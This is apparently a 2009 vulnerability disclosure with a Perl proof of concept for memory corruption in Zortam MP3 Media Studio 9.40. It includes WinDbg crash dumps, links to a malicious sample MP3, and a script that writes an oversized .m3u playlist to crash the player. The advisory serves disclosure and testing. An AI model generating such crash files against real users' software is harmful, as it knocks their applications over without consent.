#!/usr/bin/perl # # # Title: Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities # # Product web page: http://www.zortam.com # # Desc: Zortam MP3 Studio version 9.40 suffers from a memory corruption attack from # two different malicious files. The first method is thru a .mp3 file which # has its ID3 tags filled with long strings. The second method is a .m3u list # which is loaded in to the player resulting in memory corruption of the whole # application including Dr.Watson crashing along with the app. For 1st method, # you can click the Search Media for MP3's button and select the folder where # the .mp3 file with the long ID3 tags is located..boom! The 2nd method, load # .m3u file into the MP3 Player..boom boom! # # Tested on: Microsoft Windows XP Professional SP3 (English) # # # WinDbg: # # [*] overly long id3 tags (.mp3 file): # --------------------------------------------------------------------------- # # (edc.f34): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00014d6a ebx=00014d6b ecx=000052c8 edx=00029ad4 esi=03a64ffd edi=03aa3864 # eip=005788fe esp=0012cc9c ebp=00029ad4 iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202 # *** ERROR: Symbol file could not be found. Defaulted to export symbols for [path]\zmmspro.exe - # zmmspro!ID3_FrameInfo::FieldFlags+0xdce: # 005788fe f3a5 rep movs dword ptr es:[edi],dword ptr [esi] # # --------------------------------------------------------------------------- # # # [*] long playlist (.m3u file): # --------------------------------------------------------------------------- # # (84.b98): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54 # eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206 # zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9: # 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=???????? # 0:000> g # (84.b98): Access violation - code c0000005 (!!! second chance !!!) # eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54 # eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040206 # zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9: # 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=???????? # # --------------------------------------------------------------------------- # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # liquidworm gmail com # # Zero Science Lab - http://www.zeroscience.org # # 16.07.2009 # # # For first method, use folowing PoC file: # # # ################################################################ # # # - 1. http://zeroscience.org/codes/aimp2_evil.mp3 # # # # - 2. http://milw0rm.com/sploits/2009-aimp2_evil.mp3 (mirror) # # # # - 3. http://securityreason.com/download/11/13 (mirror) # # # ################################################################ # # # # # For second method, use folowing PoC code: # $fle = "Kung_PoW.m3u"; $mna = "A" x 800000; print "\n\n[+] Creating playlist file: $fle ...\r\n"; sleep 1; open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!"; print m3u "$mna"; close (m3u); print "\n[+] Playlist file successfully created!\r\n";